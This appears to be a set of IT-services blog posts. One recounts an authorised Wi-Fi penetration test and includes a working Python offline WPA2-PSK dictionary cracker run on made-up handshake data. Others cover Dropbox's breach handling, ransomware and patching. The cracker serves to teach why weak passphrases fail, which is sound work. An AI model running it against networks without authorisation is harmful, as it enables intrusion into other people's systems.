White Hat Hacking: Doing Wrong to Do Right

Over a month ago, Triton Technologies was given a challenge.

The challenge was simple: break our wireless network and you have our security contract. That sounds great in theory, but in practice white hat hacking is complex, methodical and time-consuming work.

Security Penetration: Break Their Wireless Network

We had been trying to win this company as a client for years, and we already had a general picture of their security and data-protection shortcomings. So we set out to do what we had been asked to do: break their wireless network.

In order to protect something, you need to know what weapons your adversary is going to use. If you don’t know, you can’t defend against them and the battle is lost before it starts.

Here’s What We Did

Step 1. We acquired several Raspberry Pi 3 minicomputers fitted with external wireless adapters and antennas that support monitor mode (a requirement for passive capture with Aircrack-ng). We installed Kali Linux and Aircrack-ng on each and connected them all through a cellular VPN to our Amazon (AWS) cracking cluster.

Step 2. Over a period of days, we passively captured the traffic passing between the client’s devices and their wireless access points. Using well-known capture techniques, we collected gigabytes of traffic, including the authentication handshakes between clients and access points, which are the only part an offline password attack actually needs.

Step 3. Using our Amazon cluster of dedicated CPUs, we uploaded the packet captures and ran an offline dictionary attack with Aircrack-ng against the captured handshakes, testing candidate passphrases until one reproduced the handshake we had recorded. Because this stage is entirely offline, the target network never sees any of it.

Step 4. And we waited. And waited.
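What the cracking cluster in Steps 3 and 4 is actually doing deserves a closer look, because it also explains why the weak password policy found later on the page mattered so much. The following is an added example written for this page, not Triton’s own tooling or Aircrack-ng code: a small Python reimplementation of an offline WPA2-PSK dictionary attack. It derives the PMK (PBKDF2-HMAC-SHA1, 4096 iterations, salted with the SSID), expands it to the PTK using the two MAC addresses and two nonces that are visible in the capture, computes the handshake MIC over message 2, and compares it with the MIC the client transmitted. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed here for the demo; in a real assessment every one of them comes from the packet capture.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Toy reimplementation of the offline stage of the attack: for each candidate
passphrase derive PMK -> PTK -> MIC and compare with the MIC the station sent.
All inputs below are constructed for the demo, not taken from a real network.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # Those 4096 iterations are the only thing slowing an offline attacker down.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Both MACs and both nonces are public: they are sent in the clear in the handshake.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes  # message 2 of the 4-way handshake with its MIC field zeroed
    mic: bytes    # the MIC the station actually transmitted


def candidate_matches(hs: Handshake, passphrase: str) -> bool:
    pmk = wpa2_pmk(passphrase, hs.ssid)
    kck = wpa2_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]  # KCK = PTK[0:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic)


def crack(hs: Handshake, wordlist) -> Optional[str]:
    """Return the first passphrase that reproduces the captured MIC, or None."""
    for word in wordlist:
        if candidate_matches(hs, word):
            return word
    return None


# --- constructed sample "capture" (hypothetical values) -----------------------
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 for CCMP: key info 0x010a (version 2, pairwise, MIC), MIC zeroed
EAPOL_M2 = (
    b"\x01\x03\x00\x75"                          # EAPOL: version 1, type Key, body length 117
    + b"\x02\x01\x0a\x00\x10"                    # descriptor type RSN, key info, key length 16
    + b"\x00" * 7 + b"\x01"                      # replay counter 1
    + SNONCE
    + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
    + b"\x00" * 16                               # MIC field, zeroed for the computation
    + b"\x00\x16"                                # key data length 22
    + bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE (CCMP/PSK)
)


def make_handshake(ssid: str, passphrase: str) -> Handshake:
    """Build the handshake a client using this passphrase would have sent.
    In a real assessment these bytes come from the capture, not from here."""
    pmk = wpa2_pmk(passphrase, ssid)
    kck = wpa2_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return Handshake(ssid, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2, eapol_mic(kck, EAPOL_M2))


# constructed wordlist; real attacks use lists with millions of entries
WORDLIST = ["letmein1", "password", "password1", "password123", "Welcome1", "Summer2016"]

if __name__ == "__main__":
    weak = make_handshake("Client-WiFi", "password123")
    strong = make_handshake("Client-WiFi", "7qZ!vm2#Lr9&pXw4Tb")
    print("weak PSK recovered:", crack(weak, WORDLIST))
    print("strong PSK recovered:", crack(strong, WORDLIST))
```

The weak passphrase falls on the fourth guess; the long random one is never found because it is not in any wordlist, and at 4096 PBKDF2 iterations per guess no amount of Amazon CPU turns that into a feasible search. That is the whole argument for long, unguessable pre-shared keys on networks you cannot otherwise lock down. The PMK derivation can be checked against the published 802.11i test vector (passphrase "password", SSID "IEEE").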

Mission Accomplished

We came in after a long holiday weekend and found that the cracking utility had recovered the Wi-Fi password. We drove out to the client, who had no idea we were there, joined their wireless network with that password and from there had access to their entire internal infrastructure.

A few days later we met with the client, presented our findings, and they moved their managed IT services to us.

The Need for White Hat Hacking

What we did is known as white hat hacking: using the same penetration techniques a real attacker would, but in a controlled and authorized engagement, so that the weaknesses are found and fixed before someone else finds them. Our clients strongly encourage it as a way to test their defenses and the reliability of their hardware and services.

Only Strong As The Weakest Security

Over a period of a few days we discovered a lazy password policy, unpatched systems, and access-point firmware that had never been upgraded from the factory defaults, all of which made the compromise easier than expected. It also reinforces the need for long, complex passwords, most of all on devices you cannot otherwise lock down, such as wireless access points or cellular devices: a short or dictionary-based Wi-Fi password falls to exactly the offline attack described above, while a long random passphrase does not, no matter how much computing power is thrown at it. We cannot harp enough that length and complexity help, and that the password should be changed whenever staff who knew it leave.

We replaced their wireless access points with Ubiquiti hardware, changed the credentials, and are now monitoring their entire infrastructure on a minute-by-minute basis. Contact us to learn the weaknesses in your current system and what we can do to help.

Data Breaches and Dropbox

Over 4 years ago, Dropbox suffered a data breach that exposed roughly 68 million user accounts. The stolen data included email addresses and hashed passwords (a mix of salted SHA-1 and bcrypt), and the older SHA-1 hashes in particular can be cracked offline to recover the original passwords. Here we look at data breaches and Dropbox, namely their failure in handling it.

The breach happened in 2012. Users were only told about it in August 2016. That is a massive breach of trust: 4 years of your credentials circulating among criminals without you knowing about it. Worse than the delay, though, was how Dropbox handled it.

How They Handled the Data Breach

In most data breach situations, the company notifies users almost immediately upon learning of it, forces a password change, and almost always adds another layer of security, such as two-factor authentication, to prevent it from happening again.

This time around, no such luck.

At best, Dropbox advised users to change their passwords, but did not require it. This is terribly bad. Not only did four years pass before the breach was discovered and disclosed, but a password change after that long does nothing about what an attacker could already have done with the credentials in the meantime: logged in, copied the data, or reused the same email-and-password combination against other services where it was also valid.

Triton’s Recommendation: Change Your File Sharer

Many businesses and personal users rely on file sharing services like Dropbox to transfer files and access them on the go. The copying or deletion of those files in a data breach is not only a setback, but can become a real liability for companies that transfer client data.

You have to be able to trust the service you use.

That is why Triton Technologies can no longer recommend Dropbox for your individual file sharing and mobile needs.

We recommend a product called Share Sync. Share Sync has proven to us how safe, secure and compliant it is with industry standards and laws. If you do use Dropbox, uninstall it and switch away. Contact us to learn more about our recommendation, and about other secure services available through managed IT providers.

Dispelling Ransomware Myths

Ransomware is the new underground economy.

In the last few years, a new breed of malware has arrived on the scene, called ransomware. Basically, it encrypts all your files, demands bitcoins or some other cryptocurrency, and waits. It usually has a timer giving you a couple of days to set up an account and transfer the funds; when payment is made the criminals usually, but not always, send you the decryption key.

Why Does This Happen: Money, Greed, and a Lack of Patching

A majority of infections come from “drive-by” downloads. You visit a website, or an obscure search engine, where a malware author has purchased an ad. The ad’s code shows the ad network’s scanners something different from what it serves to visitors, so the malicious version goes undetected. When you land on the page, the ad runs JavaScript that fingerprints your browser and its plugins and then fires an exploit at whatever is vulnerable: Java, Flash/Shockwave, the browser’s own HTML and scripting engines, or another weakness on the system. Occasionally that exploit is a true zero-day, but far more often it targets a known vulnerability for which a patch exists and simply was never installed. You do not have to click anything for it to come in.

What is a “Crypto Currency”?

Years ago (and there is some disagreement about who developed it), a new type of currency was created, named “Bitcoin”. Bitcoins are not files or encrypted code you hold on your computer; they are balances recorded in a public, distributed ledger, and whoever holds the private key for an address controls the coins at that address. You can split amounts into fractions of a bitcoin to pay other people, combine them, or send money to anyone else on the planet. It is fast, easy to use, and no single government controls it. It also has drawbacks: transactions cannot be reversed, so enter the wrong address and the money is gone, never to come back, which is exactly why extortionists favor it.

My Files are Encrypted. What do I do?

Most people think nothing of the popup carrying the initial demand for payment until they go to launch a program or open a file. That is when the panic starts. Word documents, Excel spreadsheets, PDFs and more are locked down solid. The criminals want their bitcoins, and your data is being held hostage until they get them. The malware is thorough: it disables System Restore, deletes the Volume Shadow Copies Windows keeps, and wipes any backup it can reach over the network, which is why the only backup that reliably survives is one kept offline or otherwise out of reach of an infected machine.

I’ll Call the Police, They’ll Help!

Nope. The people who develop these ransomware viruses are usually overseas and use strong, correctly implemented cryptography: typically a unique symmetric key for each file, wrapped with an RSA public key (commonly 2048 bits or longer) whose private half never leaves the attacker’s server. Breaking that is not a matter of computing power, for a small business or a superpower. Unless the malware author made an implementation mistake, as has happened with a few families, the FBI, NSA, DHS and the local police cannot decrypt your files for you, though you should still report the attack. These criminals deliberately target small business owners, hospitals, and other smaller organizations precisely so that governments do not get involved; if they hit larger targets, something would be done. The best defense is simply not to get infected in the first place: a good antivirus, a disciplined patching and maintenance program, tested offline backups, and a proactive attitude to security.

Patching Your Computer

If you see a leak in a dam, you patch it right? Why not your computer?

Many people avoid patches, and yes, there are many. From Windows updates to Office updates, Adobe Reader, Shockwave, Firefox, Google Chrome and more, it takes effort to keep on top of them. Why bother? Any one of them can be the vector that lets an attacker into your computer, so every one of them should be patched. At Triton Technologies, we have an excellent patching system in place for our clients and networks. We update workstations once a day, servers weekly, and third-party software such as Adobe and Google products hourly. That closes most of the vulnerabilities drive-by exploit kits rely on before they ever get a chance to use them.

I Have a Firewall, I Don’t Need to Patch All the Time!

Nope. The firewall is another line of defense, but it should never be your only one: a drive-by download arrives over the same web traffic the firewall is configured to allow. You need a proper maintenance program, security policies, up-to-date antivirus, tested backups and more. Relying on a single piece of technology for your total defense is not only bad for data security, it could potentially bankrupt your business. If you have any of these concerns, or are recovering from a ransomware attack, contact us. We can help you get your systems back up and properly backed up, and make sure it never happens again.